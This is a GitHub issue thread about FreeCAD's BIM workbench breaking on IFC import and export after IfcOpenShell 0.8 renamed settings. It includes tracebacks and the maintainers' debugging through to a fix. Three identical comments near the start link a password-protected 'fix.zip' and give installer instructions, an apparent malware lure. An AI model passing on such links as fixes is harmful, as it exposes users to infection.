FreeCAD/FreeCAD #16064: 'Settings' object has no attribute 'DISABLE_TRIANGULATION'

Mannshoch, 2024-08-26:
### Is there an existing issue for this?

- [X] I have searched the existing issues

### Problem description

[image]

Tested with two files: 
 1. Could not provide the File (c), but see **File header**
 2. Imported File: http://www.ifcwiki.org/images/0/09/KIT-Bridge.zip

## **File 1.**
```
09:17:25  pyException: Traceback (most recent call last):
  File "/snap/freecad/1116/usr/Mod/BIM/nativeifc/ifc_objects.py", line 136, in execute
    ifc_generator.generate_geometry(obj, cached=cached)
  File "/snap/freecad/1116/usr/Mod/BIM/nativeifc/ifc_generator.py", line 68, in generate_geometry
    shape, colors = generate_shape(ifcfile, elements, cached)
  File "/snap/freecad/1116/usr/Mod/BIM/nativeifc/ifc_generator.py", line 126, in generate_shape
    iterator = get_geom_iterator(ifcfile, elements, brep_mode=True)
  File "/snap/freecad/1116/usr/Mod/BIM/nativeifc/ifc_generator.py", line 365, in get_geom_iterator
    settings.set(settings.DISABLE_TRIANGULATION, True)
  File "/snap/freecad/1116/lib/python3.10/site-packages/ifcopenshell/geom/main.py", line 212, in __getattr__
    raise AttributeError("'Settings' object has no attribute '%s'" % k)
<class 'AttributeError'>: 'Settings' object has no attribute 'DISABLE_TRIANGULATION'
09:17:25  Haus: 'Settings' object has no attribute 'DISABLE_TRIANGULATION'
09:17:25  Imported Haus.IFC ( 4.01 Mb ) in 00:00
```

### **IFC Header**
```
ISO-10303-21;
HEADER;
FILE_DESCRIPTION (( 'IFC4' ),'2;1' );
FILE_NAME ('Haus.IFC',
     '2023-06-06T11:06:02',
    ( '' ),
    ( '' ),
    'SwIFC',
    'SolidWorks 2023',
    '' );
FILE_SCHEMA (( 'IFC4' ));
ENDSEC;

DATA;
#1 = IFCPROJECT ( '17AucL3ObBPhtmvsbZQNch',#2,'Default Project','','','','', (#8),#15 ) ;
#2 = IFCOWNERHISTORY ( #5,#6, $,.ADDED.,1686049563,#5,#6,1686049563 ) ;
#3 = IFCPERSON ( '', '', '', $,$,$,$,$ ) ;
#4 = IFCORGANIZATION ( '', ' ','',$,$ ) ;
#5 = IFCPERSONANDORGANIZATION ( #3 ,#4 ,$ ) ;
#6 = IFCAPPLICATION (#7,'19.0','SolidWorks 2019','SolidWorks' ) ;
#7 = IFCORGANIZATION ( 'SW', 'SolidWorks ','SolidWorks',$,$ ) ;
...
```

## **File 2.**

```
09:30:07  Note: API not available due to missing dependencies: geometry.add_door_representation - No module named 'mathutils'
09:30:07  Note: API not available due to missing dependencies: geometry.add_railing_representation - No module named 'mathutils'
09:30:07  Note: API not available due to missing dependencies: geometry.add_representation - No module named 'bpy'
09:30:07  Note: API not available due to missing dependencies: geometry.add_window_representation - No module named 'mathutils'
09:30:07  Note: API not available due to missing dependencies: grid.create_axis_curve - No module named 'mathutils'
09:30:07  pyException: Traceback (most recent call last):
  File "/snap/freecad/1116/usr/Mod/BIM/nativeifc/ifc_objects.py", line 136, in execute
    ifc_generator.generate_geometry(obj, cached=cached)
  File "/snap/freecad/1116/usr/Mod/BIM/nativeifc/ifc_generator.py", line 68, in generate_geometry
    shape, colors = generate_shape(ifcfile, elements, cached)
  File "/snap/freecad/1116/usr/Mod/BIM/nativeifc/ifc_generator.py", line 126, in generate_shape
[... 506 lines cut ...]
```shell
OS: Ubuntu Core 22 (ubuntu:GNOME/ubuntu)
Word size of FreeCAD: 64-bit
Version: 0.22.0dev.38516 (Git) Snap 1116
Build type: Release
Branch: main
Hash: 46a84da571d51b135e16ac4731baaf67c552d791
Python 3.10.12, Qt 5.15.10, Coin 4.0.0, Vtk 7.1.1, OCC 7.7.1
Locale: German/Switzerland (de_CH)
Installed mods: 
  * PieMenu 1.7.6
```

### Subproject(s) affected?

BIM

### Anything else?

Appeared after solving:   https://github.com/FreeCAD/FreeCAD/issues/15436
I get another Error If I open this IFC with other open settings: https://github.com/FreeCAD/FreeCAD/issues/16063

### Code of Conduct

- [X] I agree to follow this project's Code of Conduct

seeronline, 2024-08-26:
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

Wanderx13, 2024-08-26:
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

qlqw233, 2024-08-26:
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

maxwxyz, 2024-08-26:
@yorikvanhavre FYI

Roy-043, 2024-08-26:
I have removed some rogue comments.

yorikvanhavre, 2024-09-03:
@Mannshoch can you try the following in the FreeCAD Python console?
```python
import ifcopenshell
ifcopenshell.version
dir(ifcopenshell.geom.settings())
```
and post the results here?
Thanks!

Mannshoch, 2024-09-05:
```
>>> import ifcopenshell
>>> ifcopenshell.version
'0.8.0'
>>> dir(ifcopenshell.geom.settings())
Traceback (most recent call last):
  File "<input>", line 1, in <module>
AttributeError: module 'ifcopenshell' has no attribute 'geom'
```

```
OS: Ubuntu Core 22 (ubuntu:GNOME/ubuntu)
Word size of FreeCAD: 64-bit
Version: 0.22.0dev.38641 (Git) Snap 1126
Build type: Release
Branch: main
Hash: 01d9e0c093ed35de24b45194040069a950132045
Python 3.10.12, Qt 5.15.10, Coin 4.0.0, Vtk 7.1.1, OCC 7.7.1
Locale: German/Switzerland (de_CH)
```

Mannshoch, 2024-09-05:
`['__class__', '__delattr__', '__dict__', '__dir__', '__doc__', '__eq__', '__format__', '__ge__', '__getattr__', '__getattribute__', '__gt__', '__hash__', '__init__', '__init_subclass__', '__le__', '__lt__', '__module__', '__ne__', '__new__', '__reduce__', '__reduce_ex__', '__repr__', '__setattr__', '__sizeof__', '__str__', '__subclasshook__', '__swig_destroy__', '__weakref__', 'get', 'get_', 'name', 'rname', 'set', 'set_', 'setting_names', 'this', 'thisown', 'use_python_opencascade']`

furgo16, 2024-09-05:
Looks like this upstream bug perhaps? => https://github.com/IfcOpenShell/IfcOpenShell/issues/4909

Mannshoch, 2024-09-05:
I work with Ubuntu SNAP
```
name:      freecad
summary:   An open source parametric 3D CAD modeler
publisher: FreeCAD (freecad-org)
store-url: https://snapcraft.io/freecad
contact:   https://forum.freecad.org/viewtopic.php?f=42&t=68714
license:   LGPL-2.0-or-later
description: |
  FreeCAD is a parametric 3D modeler. Parametric modeling
  allows you to easily modify your design by going back into
  your model history and changing its parameters. FreeCAD is
  open source (LGPL license) and completely modular, allowing
  for very advanced extension and customization.
  
  FreeCAD is multiplatfom, and reads and writes many open
  file formats such as STEP, IGES, STL and others.
  
  **Channels**
  
  There are three maintained channels for this snap:
  
  - `stable` contains the latest upstream release, i.e. the most recent tagged commit. (**Use this
  if you don't know what you're doing.**)
  - `beta` contains automated weekly promotions from `edge`. (**Use this if you want edge with fewer
  updates.**)
  - `edge` contains automated (daily) builds from the latest master commit. (**Use this to test new
  features. Might be unstable.**)
  
  **Apps/Commands**
  
  There are multiple apps/commands included in the snap:
  
  - `freecad`:               Run FreeCAD
  - `freecad.cmd`:      Run FreeCAD command line interface
  - `freecad.pip`:        Install python packages for user (not system-wide).
                         E.g. `freecad.pip install py_slvs` for Assembly3.
  
  
  Side note: There is a FreeCAD experimental branch called 'Link branch' created by a user named
  'realthunder' that has become popular. It is available as a Snap package named
  `freecad-realthunder` (https://snapcraft.io/freecad-realthunder).
commands:
  - freecad.cmd
  - freecad
  - freecad.pip
snap-id:      6gjU50q0lEDaMTtSUxYoVDSmjR5fERpB
tracking:     latest/edge
refresh-date: heute um 07:53 CEST
channels:
  latest/stable:    0.21.2         2024-01-28  (908) 855MB -
  latest/candidate: 0.21.2         2024-01-27  (908) 855MB -
  latest/beta:      0.22-g58b3d021 2024-07-28 (1090) 800MB -
  latest/edge:      0.22-g01d9e0c0 2024-09-05 (1126) 794MB -
installed:          0.22-g01d9e0c0            (1126) 794MB -
```

Mannshoch, 2024-09-05:
is the error while trying to save a buch of bodies as IFC
`module ''ifccopenshell' has not attribute 'guid'`

also caused by this?

furgo16, 2024-09-05:
> I work with Ubuntu SNAP

I do as well, which means ifcopenshell is bundled in the package. As we're using the `edge` channel with the daily builds, the latest ifcopenshell available from the PyPI archive is used. In summary, this means we're using ifcopenshell v0.8.0.

According to this [ifcopenshell bug](https://github.com/IfcOpenShell/IfcOpenShell/issues/4909), and if I follow it correctly, the `DISABLE_TRIANGULATION` setting was renamed to `ITERATOR_OUTPUT`. However, having tested a local build with a change from `DISABLE_TRIANGULATION` to `ITERATOR_OUTPUT` here:

https://github.com/FreeCAD/FreeCAD/blob/0026a35886cf7b62d5fa5861ba1e52f7434f84e2/src/Mod/BIM/nativeifc/ifc_generator.py#L365

... does not seem to work.

Moult, 2024-09-05:
Upstream docs are outdated.

```
settings.set("iterator-output", ifcopenshell.ifcopenshell_wrapper.NATIVE)
```

furgo16, 2024-09-05:
> `settings.set("iterator-output", ifcopenshell.ifcopenshell_wrapper.NATIVE)`

I might not be following this correctly (apologies), but the above also returns an error:

```python-traceback
AttributeError: module 'ifcopenshell.ifcopenshell_wrapper' has no attribute 'NATIVE'
```

```python
dir(ifcopenshell.ifcopenshell_wrapper)
['ALWAYS', 'BRep', 'BRepElement', 'CARTESIAN_DOUBLE', 'CARTESIAN_QUOTIENT', 'DoubleVector', 'DoubleVectorVector', 'EXACT_CONSTRUCTIONS', 'EXACT_PREDICATES', 'Element', 'ElementSettings', 'FILTERED_CARTESIAN_QUOTIENT', 'FileDescription', 'FileName', 'FileSchema', 'FloatVector', 'FloatVectorVector', 'GeometrySerializer', 'GltfSerializer', 'HdfSerializer', 'HeaderEntity', 'IfcBaseEntity', 'IfcBaseInterface', 'IfcBaseType', 'IfcEntityInstanceData', 'IfcLateBoundEntity', 'IfcSpfHeader', 'IntVector', 'Iterator', 'IteratorSettings', 'Material', 'Matrix', 'ON_SLABS_AND_WALLS', 'ON_SLABS_AT_FLOORPLANS', 'Representation', 'Serialization', 'SerializedElement', 'SerializerSettings', 'StringVector', 'SvgSerializer', 'SwigPyIterator', 'Transformation', 'Triangulation', 'TriangulationElement', 'Triangulation_box_project_uvs', 'WaveFrontOBJSerializer', 'WriteOnlyGeometrySerializer', 'XmlSerializer', 'XmlSerializerFactory', 'XmlSerializerFactory_implementations', '_SwigNonDynamicMeta', '__builtin__', '__builtins__', '__cached__', '__doc__', '__eq__', '__file__', '__loader__', '__lt__', '__name__', '__package__', '__spec__', '_ifcopenshell_wrapper', '_swig_add_metaclass', '_swig_python_version_info', '_swig_repr', '_swig_setattr_nondynamic_class_variable', '_swig_setattr_nondynamic_instance_variable', 'abstract_arrangement', 'aggregation_type', 'attribute', 'attribute_value_derived', 'buffer', 'clash', 'clashes', 'clear_schemas', 'construct_iterator_with_include_exclude', 'construct_iterator_with_include_exclude_globalid', 'construct_iterator_with_include_exclude_id', 'context', 'create_shape', 'cvar', 'declaration', 'drawing_meta', 'entity', 'entity_instance', 'enumeration_type', 'file', 'file_guid_map', 'file_lazy_load', 'file_open_status', 'float_array_3', 'geometry_data', 'get_feature', 'get_info_cpp', 'get_log', 'horizontal_plan', 'horizontal_plan_at_element', 'instance_factory', 'inverse_attribute', 'line_segment', 'line_segments_to_polygons', 'named_type', 'new_IfcBaseClass', 'open', 'parameter_type', 'parse_ifcxml', 'polygon_2', 'polygons_to_svg', 'ray_intersection_result', 'ray_intersection_results', 'read', 'register_schema', 'schema_by_name', 'schema_definition', 'schema_names', 'select_type', 'serialise', 'set_feature', 'set_log_format_json', 'set_log_format_text', 'simple_type', 'storey_sorter', 'svg_groups_of_line_segments', 'svg_groups_of_polygons', 'svg_line_segments', 'svg_loop', 'svg_loops', 'svg_point', 'svg_polygons', 'svg_to_line_segments', 'tesselate', 'tree', 'tree_is_manifold', 'tree_vector_to_list', 'turn_off_detailed_logging', 'turn_on_detailed_logging', 'type_declaration', 'version', 'vertical_section']
```

yorikvanhavre, 2024-09-05:
Thanks @Moult ! I guess we'll need to adapt FreeCAD for both IOS 0.7 and 0.8. I'll look into that.

> AttributeError: module 'ifcopenshell.ifcopenshell_wrapper' has no attribute 'NATIVE'

This works for me... Maybe the version in the snap package is too old?

furgo16, 2024-09-05:
> This works for me... Maybe the version in the snap package is too old?

My mistake. I tried the later on my local build, which has ifcopenshell 'v0.7.0-c7830e9e5'. The snap package has v0.8.0.

yorikvanhavre, 2024-09-05:
I'm working on it ;) There is more to it, many things changed in 0.8...

furgo16, 2024-09-05:
Thanks for your work! No pressure, just trying to help even if it's not much.

yorikvanhavre, 2024-09-05:
Matrices changed too :sweat_smile: https://github.com/IfcOpenShell/IfcOpenShell/issues/4832#issuecomment-2158583873

Mannshoch, 2024-10-18:
For the record. Import works in my case now. 

Now I tested to import an iges and export it to IFC.

```
08:29:51  pyException: Traceback (most recent call last):
  File "<string>", line 1435, in <module>
  File "/snap/freecad/1165/usr/Mod/BIM/importers/exportIFC.py", line 305, in export
    contextCreator = exportIFCHelper.ContextCreator(ifcfile, objectslist)
  File "/snap/freecad/1165/usr/Mod/BIM/importers/exportIFCHelper.py", line 133, in __init__
    self.project = self.createProject()
  File "/snap/freecad/1165/usr/Mod/BIM/importers/exportIFCHelper.py", line 193, in createProject
    return self.createAutomaticProject()
  File "/snap/freecad/1165/usr/Mod/BIM/importers/exportIFCHelper.py", line 198, in createAutomaticProject
    self.getProjectGUID(),
  File "/snap/freecad/1165/usr/Mod/BIM/importers/exportIFCHelper.py", line 217, in getProjectGUID
    return ifcopenshell.guid.new()
<class 'AttributeError'>: module 'ifcopenshell' has no attribute 'guid'
```

```
OS: Ubuntu Core 22 (ubuntu:GNOME/ubuntu-xorg/xcb)
Word size of FreeCAD: 64-bit
Version: 1.1.0dev.38986 (Git) Snap 1165
Build type: Release
Branch: main
Hash: 6c8c263297dbb8b5f4e39e6cd1d2ef85b7fca380
Python 3.10.12, Qt 5.15.10, Coin 4.0.0, Vtk 7.1.1, OCC 7.7.1
Locale: German/Switzerland (de_CH)
Stylesheet/Theme/QtStyle: FreeCAD Dark.qss/FreeCAD Dark/Qt default
```
`
__________________________________`

Same file import and export on Windows
```
17:11:27  pyException: Traceback (most recent call last):
  File "<string>", line 3, in <module>
  File "C:\CAD\FreeCAD_weekly-builds-38977-conda-Windows-x86_64-py311\bin\Lib\site-packages\shiboken2\files.dir\shibokensupport\feature.py", line 139, in _import
    return original_import(name, *args, **kwargs)
           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "C:\CAD\FreeCAD_weekly-builds-38977-conda-Windows-x86_64-py311\Mod\BIM\importers\exportIFC.py", line 39, in <module>
    import Draft
  File "C:\CAD\FreeCAD_weekly-builds-38977-conda-Windows-x86_64-py311\bin\Lib\site-packages\shiboken2\files.dir\shibokensupport\feature.py", line 139, in _import
    return original_import(name, *args, **kwargs)
           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "C:\CAD\FreeCAD_weekly-builds-38977-conda-Windows-x86_64-py311\Mod\Draft\Draft.py", line 98, in <module>
    from draftfunctions.svg import (get_svg,
  File "C:\CAD\FreeCAD_weekly-builds-38977-conda-Windows-x86_64-py311\bin\Lib\site-packages\shiboken2\files.dir\shibokensupport\feature.py", line 139, in _import
    return original_import(name, *args, **kwargs)
           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "C:\CAD\FreeCAD_weekly-builds-38977-conda-Windows-x86_64-py311\Mod\Draft\draftfunctions\svg.py", line 35, in <module>
    import WorkingPlane
  File "C:\CAD\FreeCAD_weekly-builds-38977-conda-Windows-x86_64-py311\bin\Lib\site-packages\shiboken2\files.dir\shibokensupport\feature.py", line 139, in _import
    return original_import(name, *args, **kwargs)
           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "C:\CAD\FreeCAD_weekly-builds-38977-conda-Windows-x86_64-py311\Mod\Draft\WorkingPlane.py", line 44, in <module>
    from draftutils import gui_utils
  File "C:\CAD\FreeCAD_weekly-builds-38977-conda-Windows-x86_64-py311\bin\Lib\site-packages\shiboken2\files.dir\shibokensupport\feature.py", line 139, in _import
    return original_import(name, *args, **kwargs)
           ^^^<class 'ImportError'>: DLL load failed while importing _coin: Invalid access to memory location.
```
```
OS: Windows 10 build 19045
Word size of FreeCAD: 64-bit
Version: 1.1.0dev.38977 (Git)
Build type: Release
Branch: main
Hash: facd8ca6e0303cf96297a7a7398185770c1a1e0b
Python 3.11.9, Qt 5.15.13, Coin 4.0.3, Vtk 9.2.6, OCC 7.7.2
Locale: German/Switzerland (de_CH)
Stylesheet/Theme/QtStyle: unset/unset/Qt default
```

yorikvanhavre, 2024-10-18:
Can you attach a file so we can try to reproduce the problem?

Mannshoch, 2024-10-18:
Linux: [Plate-export.FCStd.zip](https://github.com/user-attachments/files/17434739/Plate-export.FCStd.zip)

1. Open FreeCAD
2. Open FreeCAdFile
3. Press CTRL+A
4. Save as IFC

The Windows error does not anymore appear.

yorikvanhavre, 2024-10-21:
I get no error when saving as IFC:

[image]

However, when reopening the IFC file in FreeCAD, some objects get very roughly triangulated:

[image]

This is apparently so in the IFC file already, so the problem is likely at export. I'm trying to use the IfcOpenShell serializer (preferences -> import/export -> IFC export -> enable serializer), but I get a crash now. Investigating...

Mannshoch, 2024-12-05:
With a full import I get a huge error log: https://pastebin.com/Ls10YnYB
Disable_Triangulation is not anymore mentioned here. should I create a new Issue for that?
```
OS: Ubuntu Core 22 (ubuntu:GNOME/ubuntu-xorg/xcb)
Architecture: x86_64
Version: 1.1.0dev.39454 (Git) Snap 1216
Build type: Release
Branch: main
Hash: a97677ed2f0ee4875321f3043782cf77e3756cc6
Python 3.10.12, Qt 5.15.10, Coin 4.0.0, Vtk 7.1.1, OCC 7.7.1
Locale: German/Switzerland (de_CH)
Stylesheet/Theme/QtStyle: OpenDark.qss/OpenDark/Fusion
Installed mods: 
  * OpenTheme 2024.9.1
```

yorikvanhavre, 2024-12-06:
> With a full import I get a huge error log: https://pastebin.com/Ls10YnYB

This should be fixed with https://github.com/FreeCAD/FreeCAD/pull/18264

maxwxyz, 2024-12-06:
Closing then if fixed with https://github.com/FreeCAD/FreeCAD/pull/18264

closed 2024-12-06 by maxwxyz